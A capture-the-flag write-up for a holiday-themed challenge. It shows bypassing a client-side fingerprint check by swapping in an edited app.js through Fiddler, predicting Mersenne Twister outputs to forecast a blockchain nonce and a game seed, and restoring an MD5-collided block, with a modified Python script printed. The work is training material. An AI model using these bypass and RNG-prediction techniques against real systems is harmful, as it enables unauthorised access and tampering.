  1. When you click the elevator panel, a JavaScript file named “app.js” gets loaded. On a successful fingerprint scan, it checks for a token named “besanta”.
  2. We host a copy of “app.js” locally with the “besanta” check removed, then use Fiddler to serve that file in place of the server’s app.js.
  3. With the “besanta” check removed, the fingerprint check is bypassed.

Process :

The actions below are performed as me (not as Santa).
Right-click the “Scan Fingerprint” image and choose “Inspect”.

Use Chrome’s Inspect to look at the JavaScript behind the “Scan fingerprint” image

You will see that the fingerprint image is actually a DIV with class name “print-cover”, whose click handler lives in app.js.

View source showing the click handler will execute a function in https://elevator.kringlecastle.com/app.js

Now look at the click handler in app.js.
In addition to the “powered” check, it checks for a token named “besanta“.
If it’s there, it lets you into Santa’s office; if not, it plays an error sound.

Click handler of “Scan fingerprint” image

Now, what we can do is make a copy of this app.js and remove the && hasToken(‘besanta’) condition.
Then host that copy on a local IIS server (e.g. http://localhost/app.js).

Check for “besanta” removed in local app.js
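As a sketch, the edit itself can be scripted. The helper below is hypothetical: the condition string is the one quoted above, and the file path is wherever you saved your copy of app.js.

```python
from pathlib import Path

def remove_besanta_check(path):
    """Strip the besanta token check from a saved copy of app.js."""
    src = Path(path).read_text()
    # Drop only the token condition; the 'powered' check stays intact.
    patched = src.replace("&& hasToken('besanta')", "")
    Path(path).write_text(patched)
    return patched
```

Run `remove_besanta_check("app.js")` before copying the file to the IIS webroot.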

Open Fiddler and apply a filter for app.js, so that when you click the scan fingerprint image, only that URL is captured.
https://elevator.kringlecastle.com/app.js

  1. Traffic to https://elevator.kringlecastle.com/app.js is captured.
  2. Filter applied
  3. Filter to “show if URL contains”
  4. Filter value “app.js”

Save the contents of https://elevator.kringlecastle.com/app.js to a file named app.js and put the file in the local IIS webroot (e.g. c:\inetpub\wwwroot) so the file is accessible at https://localhost/app.js

See the below screenshot (steps are numbered):
Go to Fiddler > AutoResponder (1) > Enable Rules (2) > Add Rule (3) > Add https://localhost/app.js (4) > Save (5)

This will replace app.js from the server https://elevator.kringlecastle.com/app.js (which has the ‘besanta’ check) with our local copy (which doesn’t).

Now when you click on the fingerprint scanner, you will be able to get into Santa’s office.

Objective 11a): Naughty/Nice List with Blockchain Investigation Part 1

Even though the chunk of the blockchain that you have ends with block 129996, can you predict the nonce for block 130000? Talk to Tangle Coalbox in the Speaker UNpreparedness Room for tips on prediction and Tinsel Upatree for more tips and tools. (Enter just the 16-character hex value of the nonce)

Answer : 57066318F32F729D

High-level approach :

In Santa’s office, Tinsel Upatree has the Blockchain.dat and the zip file containing the Python scripts.
The naughty_nice.py verifies the blockchain up to block# 129996, so we have nonces up to block# 129996.
If we take the last 624 nonces, ending with the one for block# 129996, we can use the MT19937Predictor to get the nonces of blocks 129997, 129998, 129999 and finally 130000, which is what this objective needs.
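For intuition, the same prediction trick can be demonstrated self-contained with Python’s stdlib `random` (which uses MT19937 internally): collect 624 32-bit outputs, invert the output tempering, and rebuild the generator state. This is a sketch of the principle, not the writeup’s actual script, which uses the mt19937predictor package on 64-bit nonces.

```python
import random

MASK32 = 0xFFFFFFFF

def undo_xor_rshift(y, shift):
    # Invert y ^= y >> shift by re-applying the shift until it stabilizes.
    result = y
    for _ in range(32 // shift + 1):
        result = y ^ (result >> shift)
    return result & MASK32

def undo_xor_lshift_mask(y, shift, mask):
    # Invert y ^= (y << shift) & mask the same way.
    result = y
    for _ in range(32 // shift + 1):
        result = y ^ ((result << shift) & mask)
    return result & MASK32

def untemper(y):
    # Reverse MT19937's output tempering to recover one raw state word.
    y = undo_xor_rshift(y, 18)
    y = undo_xor_lshift_mask(y, 15, 0xEFC60000)
    y = undo_xor_lshift_mask(y, 7, 0x9D2C5680)
    y = undo_xor_rshift(y, 11)
    return y

rng = random.Random(2020)                 # stands in for the blockchain's RNG
outputs = [rng.getrandbits(32) for _ in range(624)]

# Rebuild the 624-word internal state and load it into a fresh generator.
state = [untemper(o) for o in outputs]
clone = random.Random()
clone.setstate((3, tuple(state + [624]), None))  # pos=624: all words consumed

print(clone.getrandbits(32) == rng.getrandbits(32))  # True: output predicted
```

Once the clone is in sync, every subsequent output is predictable, which is exactly why a 64-bit nonce drawn from an unseeded Mersenne Twister is not safe.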

Details :

The zip file named OfficialNaughtyNiceBlockchainEducationPack.zip has the following contents.
We put Blockchain.dat alongside them to examine it using naughty_nice.py.

Contents of “OfficialNaughtyNiceBlockchainEducationPack.zip”

The naughty_nice.py was changed to collect the last 624 nonces of the blockchain.
Those 624 nonces were fed into MT19937Predictor() to get the nonce for block# 129997.
The nonce of 129997 was then included in the list to get the nonce for block# 129998.
The nonce of 129998 was included in the list to get the nonce for block# 129999.
The nonce of 129999 was included in the list to get the nonce for block# 130000.

For changes in the naughty_nice.py, compare the naughty_nice_original.py and naughty_nice.py.

Changes in “naughty_nice.py”
Running naughty_nice.py. The nonce for block# 130000 is 6270808489970332317

Converted to hexadecimal, that is 57066318F32F729D, and that’s the answer.

Converting decimal to hex
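The decimal-to-hex conversion is a one-liner in Python:

```python
# Format the predicted nonce as the 16-character uppercase hex answer.
nonce = 6270808489970332317
print(f"{nonce:016X}")  # 57066318F32F729D
```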

The below zip file contains the changed naughty_nice.py (please remove the .txt after extraction)

naughty_nice.py

#!/usr/bin/env python3
'''
So, you want to work with the naughty/nice blockchain?

Welcome!  

This python module is your first step in that process. It will introduce you to how the Naughty/Nice
blockchain is structured and how we at the North Pole use blockchain technology. The North Pole
has been using blockchain technology since Santa first invented it back in the 1960's. (Jolly
prankster that he is, Santa posted a white paper on the Internet that he wrote under a pseudonym
describing a non-Naughty/Nice application of blockchains a dozen or so years back. It caused quite
a stir...)

Important note: This module will NOT allow you to add content to the Official Naughty/Nice Blockchain!
That can only be done through the Official Naughty/Nice Website, which passes new blocks to the Official
Santa Signature System (OS3) that applies a digital signature to the content of each block before it is
added to the chain. Only blocks whose contents have been digitally signed by that system are placed on
the Naughty/Nice blockchain.

Note: If you're authorized to use the Official Naughty/Nice website, you will have been given a login and
password for that site after completing your training as a part of Elf University's "Assessing and
Evaluating Human Behavior for Naughty/Niceness" Curriculum.

This code is used to introduce how blocks/chains are created and allow you to view and/or validate 
portions (or the entirety) of the Official Naughty/Nice Blockchain.

A blockchain, while a part of the whole cryptocurrency "fad" that a certain pseudonym-packing North Pole
resident appears to have begun, are certainly not limited to that use. A blockchain can be used anywhere
that a record of information or transactions need to be maintained in a way that cannot be altered. And
really, what information is more important (and necessarily unalterable) than acts of Naughty/Niceness?

A blockchain works by linking each record together with the previous record. Each block's data contains
a cryptographic hash of the previous block's data. Because a block cannot be altered without altering
the cryptographic hash of its contents, any alteration of the data within a block will be immediately
evident, because every following block will no longer be valid.

In addition to this built-in property of a blockchain, the Official Naughty/Nice Blockchain has a few
other safeguards. The cryptographic hash of each block is signed using the Official Santa Signature
System (OS3). Currently, the Official Naughty/Nice Blockchain uses MD5 as its hashing algorithm, but
plans are in place to move to SHA256 in 2021. This update is part of a phased process to modernize
the blockchain code. In 2019, the entire blockchain system was ported from the original COBOL code to
Python3. Because of concerns about hash collisions in MD5, in the new Python3 code, a 64-bit random 
"nonce" was added to the beginning of each block at the time of creation.

This module represents a portion of the most current blockchain codebase. It consists of two classes,
one for the creation of blocks, called Block(), and one for the creation, examination, and verification of
chains of blocks, called Chain(). 

The following is an overview of the functionality provided by these classes:

The Chain() class is where most blockchain work is performed. It is designed to be as "block-agnostic"
as possible, so it can be used with blocks that hold different types of data. To use a different type
of block, you simply replace (or subclass) the Block() class. For this to work, there are several
functions that MUST be supplied by the Block() class. Let's take a look at those.

The Block() class MUST supply the following functions, used by the Chain() class:

    create_genesis_block() - This creates a very special block used at the beginning of the blockchain,
    and known as the "genesis" block. Because it has no previous block to reference it is, by definition,
    always considered valid. This block uses an agreed-upon, fake previous hash value.

    verify_types() - Because the Chain() class is block-agnostic, it needs the Block() class to validate
    that a block contains valid data. This function returns True or False.

    block_data() - a function that returns a representation of all of the data in the block that is to
    be hashed and signed. The data is returned as a Python3 bytes object.

    full_block_data() - a function that returns a representation of the entire block, including any
    hashes and signatures. A hash of this data is what is used as the "previous hash" value in the
    subsequent block. This data is returned as a Python3 bytes object. This function is also used
    when saving either the entire blockchain to a file, or a single block to a file

    load_a_block([filehandle]) - this function takes a filehandle and returns a block at a time for
    addition to the block chain. This function DOES NOT verify blocks. This function throws a
    Value_Error exception when it either encounters the end of the file or unparsable data.

The Naughty/Nice Block() class also defines a utility function:

    dump_doc([document number]) - this will dump the indicated supporting document to a file named
    as <block_index>.<data_type_extension>. Note: this function will overwrite any existing file 
    with that name, so if there are multiple documents (there can be up to 9) of the same type 
    affixed to a record, it is the responsibility of the calling process to rename them as appropriate.

The Chain() class provides the following functions:

    add_block([block_data]) - passes a block_data dictionary to the Block() initialization code.
    This function, being "block-agnostic" simply passes the block_data along. It is up to the Block()
    initialization code to validate this data.

    verify_chain([public_key], <beginning hash>) - steps through every block in the chain and
    verifies that the data in each block is of the correct type, that the block index is correct,
    that the block contains the correct hash for the previous block, and that the block signature
    is a valid signature based on the hash of the block data. It then hashes the full block for use
    as the "previous hash" on the next block. This returns True or False. (If False, it prints
    information about what, specific, issues were found and the block that triggered the issue.)
    Note: If you're working with a portion of the block chain that does not begin with a genesis
    block, you'll need to provide a value for the previous block's hash for this function to
    work.

    save_a_block(index, <filename>) - saves the block at index to the filename provided, or to 
    "block.dat" if no filename is given.

    save_chain(<filename>) - saves the chain to the filename provided, or to "blockchain.dat" if
    no filename is given.

    load_chain(<filename>) - loads a chain from the filename provided, or from "blockchain.dat" if
    no filename is given. This returns the count of blocks loaded. This DOES NOT verify that the
    data loaded is a valid blockchain. It is recommended to call verify_chain() immediately after
    loading a new chain.   

An overview of how we process the Official Naughty/Nice Blockchain:

There are approximately 7.8 billion people and magical beings on Earth, and each one is tracked
24 hours a day throughout the year by a fleet of Elves-On-The-Shelves. While those elves are
clearly visible during the Holiday season, don't be fooled into believing that we're only tracking
Naughty/Niceness at that time. On average, each of the billions of subjects that we monitor are
performing some sort of Naughty or Nice activity that rises to the level of being scored on the
blockchain around 2.1 times per week. Keeping track of all of that activity on a single blockchain
would be incredibly processing intensive (that would be ~10^12 blocks/year, or 32,000 blocks/second),
so we've broken our record-keeping into 1,000 different blockchains. If you do the math, you'll find
that each of the blockchains is now responsible for between 1,500 and 2000 blocks per minute, which
is a reasonable load. A separate database keeps track of which Personal ID (pid) is assigned to each
of the blockchains.

Throughout the year, we periodically run each of the chains to determine who is the best (and worst)
of our subjects. While only the final Holiday run is used to determine who is getting something
good in their stockings and who is getting a lump of coal, it's always interesting to see a listing
of the Nicest and Naughtiest folks out there. 

Please note: Wagering on the results of the Official Naughty/Nice Blockchain is STRICTLY PROHIBITED.

If you intend to use your access to the Official Naughty/Nice Blockchain code to facilitate any sort
of gambling, you will be racking up a whole bunch of Naughtiness points. YOU HAVE BEEN WARNED! (I'm
looking at you, Alabaster Snowball...)

For this reason, we have not provided any code that will perform a computation of Naughty/Nice
points. Additionally, for privacy reasons, there is also no code to pull the records associated
with specific individuals from this list. While the creation of that code would not be difficult,
you are honor-bound to use your access to this list for only good and noble purposes.

Signing Keys - Information

We have provided you with an example private key that you can use when generating your own blockchains
for test purposes. This private key (which also contains the public key information) is called 
private.pem.

Additionally, we have provided you with a copy of the public key used to verify the Official
Naughty/Nice Blockchain. This is the public key component of the private key used by the Official
Santa Signature System (OS3) to sign blocks on the Official Naughty/Nice Blockchain. This key
is contained in the file official_public.pem.
'''

import random
from Crypto.Hash import MD5, SHA256
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
from base64 import b64encode, b64decode
import binascii
import time
import itertools
from mt19937predictor import MT19937Predictor

genesis_block_fake_hash = '00000000000000000000000000000000'

data_types = {1:'plaintext', 2:'jpeg image', 3:'bmp image', 4:'gif image', 5:'PDF', 6:'Word', 7:'PowerPoint', 8:'Excel', 9:'tiff image', 10:'MP4 video', 11:'MOV video', 12:'WMV video', 13:'FLV video', 14:'AVI video', 255:'Binary blob'}
data_extension = {1:'txt', 2:'jpg', 3:'bmp', 4:'gif', 5:'pdf', 6:'docx', 7:'pptx', 8:'xlsx', 9:'tiff', 10:'mp4', 11:'mov', 12:'wmv', 13:'flv', 14:'avi', 255:'bin'}

Naughty = 0
Nice = 1

class Block():
    def __init__(self, index=None, block_data=None, previous_hash=None, load=False, genesis=False):
        if(genesis == True):
            return None
        else:
            self.data = []
            if(load == False):
                if all(p is not None for p in [index, block_data['documents'], block_data['pid'], block_data['rid'], block_data['score'], block_data['sign'], previous_hash]):
                    self.index = index
                    if self.index == 0:
                        self.nonce = 0 # genesis block
                    else:
                        self.nonce = random.randrange(0xFFFFFFFFFFFFFFFF)
                    self.data = block_data['documents']
                    self.previous_hash = previous_hash
                    self.doc_count = len(self.data)
                    self.pid = block_data['pid']
                    self.rid = block_data['rid']
                    self.score = block_data['score']
                    self.sign = block_data['sign']
                    now = time.gmtime()
                    self.month = now.tm_mon
                    self.day = now.tm_mday
                    self.hour = now.tm_hour
                    self.minute = now.tm_min
                    self.second = now.tm_sec
                    self.hash, self.sig = self.hash_n_sign()
                else:
                    return None

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        else:
            return False

    def __repr__(self):
        s = 'Chain Index: %i\n' % (self.index)
        s += '              Nonce: %s\n' % ('%016.016x' % (self.nonce))
        s += '                PID: %s\n' % ('%016.016x' % (self.pid))
        s += '                RID: %s\n' % ('%016.016x' % (self.rid))
        s += '     Document Count: %1.1i\n' % (self.doc_count)
        s += '              Score: %s\n' % ('%08.08x (%i)' % (self.score, self.score))
        n_n = 'Naughty'
        if self.sign > 0:
            n_n = 'Nice'
        s += '               Sign: %1.1i (%s)\n' % (self.sign, n_n)
        c = 1
        for d in self.data:
            s += '         Data item: %i\n' % (c)
            s += '               Data Type: %s (%s)\n' % ('%02.02x' % (d['type']), data_types[d['type']])
            s += '             Data Length: %s\n' % ('%08.08x' % (d['length']))
            s += '                    Data: %s\n' % (binascii.hexlify(d['data']))
            c += 1
        s += '               Date: %s/%s\n' % ('%02.02i' % (self.month), '%02.02i' % (self.day))
        s += '               Time: %s:%s:%s\n' % ('%02.02i' % (self.hour), '%02.02i' % (self.minute), '%02.02i' % (self.second))
        s += '       PreviousHash: %s\n' % (self.previous_hash)
        s += '  Data Hash to Sign: %s\n' % (self.hash)
        s += '          Signature: %s\n' % (self.sig)
        return(s)

    def full_hash(self):
        hash_obj = MD5.new()
        hash_obj.update(self.block_data_signed())
        return hash_obj.hexdigest()

    def hash_n_sign(self):
        hash_obj = MD5.new()
        hash_obj.update(self.block_data())
        signer = PKCS1_v1_5.new(private_key)
        return (hash_obj.hexdigest(), b64encode(signer.sign(hash_obj)))

    def block_data(self):
        s = (str('%016.016x' % (self.index)).encode('utf-8'))
        s += (str('%016.016x' % (self.nonce)).encode('utf-8'))
        s += (str('%016.016x' % (self.pid)).encode('utf-8'))
        s += (str('%016.016x' % (self.rid)).encode('utf-8'))
        s += (str('%1.1i' % (self.doc_count)).encode('utf-8'))
        s += (str(('%08.08x' % (self.score))).encode('utf-8'))
        s += (str('%1.1i' % (self.sign)).encode('utf-8'))
        for d in self.data:
            s += (str('%02.02x' % d['type']).encode('utf-8'))
            s += (str('%08.08x' % d['length']).encode('utf-8'))
            s += d['data']
        s += (str('%02.02i' % (self.month)).encode('utf-8'))
        s += (str('%02.02i' % (self.day)).encode('utf-8'))
        s += (str('%02.02i' % (self.hour)).encode('utf-8'))
        s += (str('%02.02i' % (self.minute)).encode('utf-8'))
        s += (str('%02.02i' % (self.second)).encode('utf-8'))
        s += (str(self.previous_hash).encode('utf-8'))
        return(s)

    def block_data_signed(self):
        s = self.block_data()
        s += bytes(self.hash.encode('utf-8'))
        s += self.sig
        return(s)

    def load_a_block(self, fh):
        self.index = int(fh.read(16), 16)
        self.nonce = int(fh.read(16), 16)
        self.pid = int(fh.read(16), 16)
        self.rid = int(fh.read(16), 16)
        self.doc_count = int(fh.read(1), 10)
        self.score = int(fh.read(8), 16)
        self.sign = int(fh.read(1), 10)
        count = self.doc_count
        while(count > 0):
            l_data = {}
            l_data['type'] = int(fh.read(2),16)
            l_data['length'] = int(fh.read(8), 16)
            l_data['data'] = fh.read(l_data['length'])
            self.data.append(l_data)
            count -= 1
        self.month = int(fh.read(2))
        self.day = int(fh.read(2))
        self.hour = int(fh.read(2))
        self.minute = int(fh.read(2))
        self.second = int(fh.read(2))
        self.previous_hash = str(fh.read(32))[2:-1]
        self.hash = str(fh.read(32))[2:-1]
        self.sig = fh.read(344)
        return self

    def create_genesis_block(self):
        block_data = {}
        documents = []
        doc = {}
        doc['data'] = bytes('Genesis Block'.encode('utf-8'))
        doc['type'] = 1
        doc['length'] = len(doc['data'])
        documents.append(doc)
        block_data['documents'] = documents
        block_data['pid'] = 0
        block_data['rid'] = 0
        block_data['score'] = 0
        block_data['sign'] = Nice
        b = Block(0, block_data, genesis_block_fake_hash)
        return b

    def verify_types(self):  # check data types of all info in a block
        rv = True
        instances = [self.index, self.nonce, self.pid, self.rid, self.month, self.day, self.hour, self.minute, self.second, self.previous_hash, self.score, self.sign]
        types = [int, int, int, int, int, int, int, int, int, str, int, int]
        if not sum(map(lambda inst_, type_: isinstance(inst_, type_), instances, types)) == len(instances):
            rv = False
        for d in self.data:
            if not isinstance(d['type'], int):
                rv = False
            if not isinstance(d['length'], int):
                rv = False
            if not isinstance(d['data'], bytes):
                rv = False
        return rv

    def dump_doc(self, doc_no):
        filename = '%s.%s' % (str(self.index), data_extension[self.data[doc_no - 1]['type']])
        with open(filename, 'wb') as fh:
            d = self.data[doc_no - 1]['data']
            fh.write(d)
        print('Document dumped as: %s' % (filename))


class Chain():
    nonce_list = [] 
    index = 0
    initial_index = 0
    last_hash_value = ''
    def __init__(self, load=False, filename=None):
        if not load:
            self.blocks = [Block(genesis=True).create_genesis_block()]
            self.last_hash_value = self.blocks[0].full_hash()
        else:
            self.blocks = []
            self.load_chain(filename)
            self.index = self.blocks[-1].index
            self.initial_index = self.blocks[0].index

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        else:
            return False

    def add_block(self, block_data):
        self.index += 1
        b = Block(self.index, block_data, self.last_hash_value)
        self.blocks.append(b)
        self.last_hash_value = b.full_hash() 

    def verify_chain(self, publickey, previous_hash=None):
        flag = True
        # unless we're explicitly told what the initial last hash should be, we assume that
        # the initial block will be the genesis block and will have a fixed previous_hash
        if previous_hash is None:
            previous_hash = genesis_block_fake_hash
        for i in range(0, len(self.blocks)):  # assume Genesis block integrity
            block_no = self.blocks[i].index
            if not self.blocks[i].verify_types():
                flag = False
                print(f'\n*** WARNING *** Wrong data type(s) at block {block_no}.')
            if self.blocks[i].index != i + self.initial_index:
                flag = False
                print(f'\n*** WARNING *** Wrong block index at what should be block {i + self.initial_index}: {block_no}.')
            if self.blocks[i].previous_hash != previous_hash:
                flag = False
                print(f'\n*** WARNING *** Wrong previous hash at block {block_no}.')
            hash_obj = MD5.new()
            hash_obj.update(self.blocks[i].block_data())
            signer = PKCS1_v1_5.new(publickey)
            if signer.verify(hash_obj, b64decode(self.blocks[i].sig)) is False:
                flag = False
                print(f'\n*** WARNING *** Bad signature at block {block_no}.')
            if flag == False:
                print(f'\n*** WARNING *** Blockchain invalid from block {block_no} onward.\n')
                return False
            previous_hash = self.blocks[i].full_hash()
        return True

    def save_a_block(self, index, filename=None):
        if filename is None:
            filename = 'block.dat'
        with open(filename, 'wb') as fh:
            fh.write(self.blocks[index].block_data_signed())

    def save_chain(self, filename=None):
        if filename is None:
            filename = 'blockchain.dat'
        with open(filename, 'wb') as fh:
            i = 0
            while(i < len(self.blocks)):
                fh.write(self.blocks[i].block_data_signed())
                i += 1

    def load_chain(self, filename=None):
        count = 0
        if filename is None:
            filename = 'blockchain.dat'
        with open(filename, 'rb') as fh:
            while(1):
                try:
                    self.blocks.append(Block(load=True).load_a_block(fh))
                    self.index = self.blocks[-1].index
                    count += 1
                except ValueError:
                    return count

if __name__ == '__main__':
    with open('private.pem', 'rb') as fh:
        private_key = RSA.importKey(fh.read())
    public_key = private_key.publickey()
    c1 = Chain()
    for i in range(9):
        block_data = {}
        documents = []
        doc = {}
        doc['data'] = bytes(('This is block %i of the naughty/nice blockchain.' % (i)).encode('utf-8'))
        doc['type'] = 1
        doc['length'] = len(doc['data'])
        documents.append(doc)
        block_data['documents'] = documents
        block_data['pid'] = 123 # this is the pid, or "person id," that the block is about
        block_data['rid'] = 456 # this is the rid, or "reporter id," of the reporting elf
        block_data['score'] = 100 # this is the Naughty/Nice score of the report
        block_data['sign'] = Nice # this indicates whether the report is about naughty or nice behavior
        c1.add_block(block_data)
    print(c1.blocks[3])
    print('C1: Block chain verify: %s' % (c1.verify_chain(public_key)))

#Note: This is how you would load and verify a blockchain contained in a file called blockchain.dat
#
    with open('official_public.pem', 'rb') as fh:
        official_public_key = RSA.importKey(fh.read())
    c2 = Chain(load=True, filename='blockchain.dat')
    print('C2: Block chain verify: %s' % (c2.verify_chain(official_public_key)))
    print(c2.blocks[0])
    c2.blocks[0].dump_doc(1)


    predictor = MT19937Predictor()
    nonce_list= []
    # Adding all the nonces of all the blocks in a list
    for i in range(len(c2.blocks)):
         nonce_list.append(c2.blocks[i].nonce)
 
    # reversing the list so the most recent nonce comes first
    nonce_list.reverse()
    # get the first 625 nonces
    last_625_block_nonce = list(itertools.islice(nonce_list,625))
    # reverse the list so we get the last 625 nonces
    last_625_block_nonce.reverse()

    # Setting the 625 nonces into the MT19937Predictor
    for nonce in last_625_block_nonce:
        predictor.setrandbits(nonce, 64)

    # calculated nonce for block 129997 [literally ran the code at this point and got it via predictor.getrandbits(64)], fed back in
    predictor.setrandbits(13205885317093879758,64)
    # calculated nonce for block 129998, obtained the same way
    predictor.setrandbits(109892600914328301,64)
    # calculated nonce for block 129999, obtained the same way
    predictor.setrandbits(9533956617156166628,64)
    # Get the nonce for block 13000
    print(predictor.getrandbits(64))

The snowball fight :

We need to solve this challenge to get more hints for objective 11b)
Welcome to Snowball Fight! You and an opponent each have five snow forts, but you can’t see the other’s layout. Start lobbing snowballs back and forth. Be the first to hit everything on your opponent’s side!
Note: On easier levels, you may pick your own name. On the Hard and Impossible level, we will pick for you. That’s just how things work around here!
What’s more, on Impossible, we won’t even SHOW you your name! In fact, just to make sure things are super random, we’ll throw away hundreds of random names before starting!

High level Approach :

  1. Open the “Impossible” game.
  2. In the Impossible game, collect the seeds and predict the next one. See below (“How to get the random seeds and calculate the next seed”).
  3. Open the game in a new window: https://snowball2.kringlecastle.com/.
  4. In this window, open an “Easy” game and use the seed predicted in step 2 as the player name.
  5. Win the Easy game and record the moves.
  6. Go back to the “Impossible” window and replay the same moves.
  7. Win the “Impossible” game.

Process details :

You will see a number of seeds in the response of the below URL:
https://snowball2.kringlecastle.com/game
There are exactly 624 seeds, suggesting the next one can be predicted with the Mersenne Twister (MT19937) algorithm.
So, we can use the mt19937predict tool to predict the next seed.

624 seeds in view source

Save all 624 seeds in data.txt.

Create a new bash script “predict-next-seed.sh” which takes the data in data.txt, applies the MT19937 predictor to it, and writes the predicted next numbers to predicted.txt

#!/bin/bash
cat data.txt | mt19937predict > predicted.txt

Run the bash script for a very short time (0.1 sec), since the predictor would otherwise keep producing numbers.

timeout 0.1s ./predict-next-seed.sh

The first entry in the output predicted.txt is the next seed.

The predicted next seed after 624 seeds is 476691297

Log in using the username 476691297 in an Easy game.
Win the Easy game and record the moves.

Then make the same moves in the Impossible window.

New hints unlocked!!

Objective 11b): Naughty/Nice List with Blockchain Investigation Part 2

Answer: fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb

High level approach :

  1. Change naughty_nice.py:
    • Get Jack’s block from the chain and save it as a binary file (block.dat)
    • Extract all the documents from Jack’s block
  2. Determine and extract the original naughty document.
    This is the document Jack modified to put the nice list on it. It involves the 1st of the four bytes Jack changed in the block.
    ref: https://speakerdeck.com/ange/colltris?slide=194
  3. Determine the naughty/nice flag.
    This is the flag Jack changed from naughty to nice; it is the 2nd byte he changed in the block.
  4. Determine the 3rd and 4th bytes changed by Jack.
    ref: https://speakerdeck.com/ange/colltris?slide=109
  5. Change the 1st, 2nd, 3rd and 4th bytes of Jack’s block back, making sure the MD5 hash does not change.
  6. Save the restored original block as block_restored.dat.
  7. Calculate the SHA256 of block_restored.dat.

Process :

Changes to naughty_nice.py:

Added a function named full_hash_SHA256() which calculates the SHA256 hash of a block. Screenshot 1 below.
Added code to calculate the SHA256 hash of each block; if it equals 58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f, the block is saved to a new file named block.dat.
It also extracts all the documents from Jack’s block: 129459.pdf and 129459.bin. Screenshot 2 below.

Screenshot 1
Screenshot 2
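The full listing below does not include those two additions, so here is a minimal sketch of what they might look like (hashlib stands in for Crypto.Hash.SHA256 and produces the same digest; find_and_dump() is an assumed helper name, not from the original file):

```python
import hashlib

TARGET = '58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f'

def full_hash_SHA256(block):
    """SHA256 over the same bytes Block.full_hash() feeds to MD5."""
    return hashlib.sha256(block.block_data_signed()).hexdigest()

def find_and_dump(chain):
    """Save the block whose SHA256 matches TARGET, then dump its documents."""
    for i, block in enumerate(chain.blocks):
        if full_hash_SHA256(block) == TARGET:
            chain.save_a_block(i, 'block.dat')          # Jack's block, verbatim
            for doc_no in range(1, block.doc_count + 1):
                block.dump_doc(doc_no)                  # e.g. 129459.pdf, 129459.bin
```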

The whole naughty_nice.py

#!/usr/bin/env python3
'''
So, you want to work with the naughty/nice blockchain?

Welcome!  

This python module is your first step in that process. It will introduce you to how the Naughty/Nice
blockchain is structured and how we at the North Pole use blockchain technology. The North Pole
has been using blockchain technology since Santa first invented it back in the 1960's. (Jolly
prankster that he is, Santa posted a white paper on the Internet that he wrote under a pseudonym
describing a non-Naughty/Nice application of blockchains a dozen or so years back. It caused quite
a stir...)

Important note: This module will NOT allow you to add content to the Official Naughty/Nice Blockchain!
That can only be done through the Official Naughty/Nice Website, which passes new blocks to the Official
Santa Signature System (OS3) that applies a digital signature to the content of each block before it is
added to the chain. Only blocks whose contents have been digitally signed by that system are placed on
the Naughty/Nice blockchain.

Note: If you're authorized to use the Official Naughty/Nice website, you will have been given a login and
password for that site after completing your training as a part of Elf University's "Assessing and
Evaluating Human Behavior for Naughty/Niceness" Curriculum.

This code is used to introduce how blocks/chains are created and allow you to view and/or validate 
portions (or the entirety) of the Official Naughty/Nice Blockchain.

A blockchain, while a part of the whole cryptocurrency "fad" that a certain pseudonym-packing North Pole
resident appears to have begun, are certainly not limited to that use. A blockchain can be used anywhere
that a record of information or transactions need to be maintained in a way that cannot be altered. And
really, what information is more important (and necessarily unalterable) than acts of Naughty/Niceness?

A blockchain works by linking each record together with the previous record. Each block's data contains
a cryptographic hash of the previous block's data. Because a block cannot be altered without altering
the cryptographic hash of its contents, any alteration of the data within a block will be immediately
evident, because every following block will no longer be valid.

In addition to this built-in property of a blockchain, the Official Naughty/Nice Blockchain has a few
other safeguards. The cryptographic hash of each block is signed using the Official Santa Signature
System (OS3). Currently, the Official Naughty/Nice Blockchain uses MD5 as its hashing algorithm, but
plans are in place to move to SHA256 in 2021. This update is part of a phased process to modernize
the blockchain code. In 2019, the entire blockchain system was ported from the original COBOL code to
Python3. Because of concerns about hash collisions in MD5, in the new Python3 code, a 64-bit random 
"nonce" was added to the beginning of each block at the time of creation.

This module represents a portion of the most current blockchain codebase. It consists of two classes,
one for the creation of blocks, called Block(), and one for the creation, examination, and verification of
chains of blocks, called Chain(). 

The following is an overview of the functionality provided by these classes:

The Chain() class is where most blockchain work is performed. It is designed to be as "block-agnostic"
as possible, so it can be used with blocks that hold different types of data. To use a different type
of block, you simply replace (or subclass) the Block() class. For this to work, there are several
functions that MUST be supplied by the Block() class. Let's take a look at those.

The Block() class MUST supply the following functions, used by the Chain() class:

    create_genesis_block() - This creates a very special block used at the beginning of the blockchain,
    and known as the "genesis" block. Because it has no previous block to reference it is, by definition,
    always considered valid. This block uses an agreed-upon, fake previous hash value.

    verify_types() - Because the Chain() class is block-agnostic, it needs the Block() class to validate
    that a block contains valid data. This function returns True or False.

    block_data() - a function that returns a representation of all of the data in the block that is to
    be hashed and signed. The data is returned as a Python3 bytes object.

    full_block_data() - a function that returns a representation of the entire block, including any
    hashes and signatures. A hash of this data is what is used as the "previous hash" value in the
    subsequent block. This data is returned as a Python3 bytes object. This function is also used
    when saving either the entire blockchain to a file, or a single block to a file

    load_a_block([filehandle]) - this function takes a filehandle and returns a block at a time for
    addition to the block chain. This function DOES NOT verify blocks. This function throws a
    Value_Error exception when it either encounters the end of the file or unparsable data.

The Naughty/Nice Block() class also defines a utility function:

    dump_doc([document number]) - this will dump the indicated supporting document to a file named
    as <block_index>.<data_type_extension>. Note: this function will overwrite any existing file 
    with that name, so if there are multiple documents (there can be up to 9) of the same type 
    affixed to a record, it is the responsibility of the calling process to rename them as appropriate.

The Chain() class provides the following functions:

    add_block([block_data]) - passes a block_data dictionary to the Block() initialization code.
    This function, being "block-agnostic" simply passes the block_data along. It is up to the Block()
    initialization code to validate this data.

    verify_chain([public_key], <beginning hash>) - steps through every block in the chain and
    verifies that the data in each block is of the correct type, that the block index is correct,
    that the block contains the correct hash for the previous block, and that the block signature
    is a valid signature based on the hash of the block data. It then hashes the full block for use
    as the "previous hash" on the next block. This returns True or False. (If False, it prints
    information about what, specific, issues were found and the block that triggered the issue.)
    Note: If you're working with a portion of the block chain that does not begin with a genesis
    block, you'll need to provide a value for the previous block's hash for this function to
    work.

    save_a_block(index, <filename>) - saves the block at index to the filename provided, or to 
    "block.dat" if no filename is given.

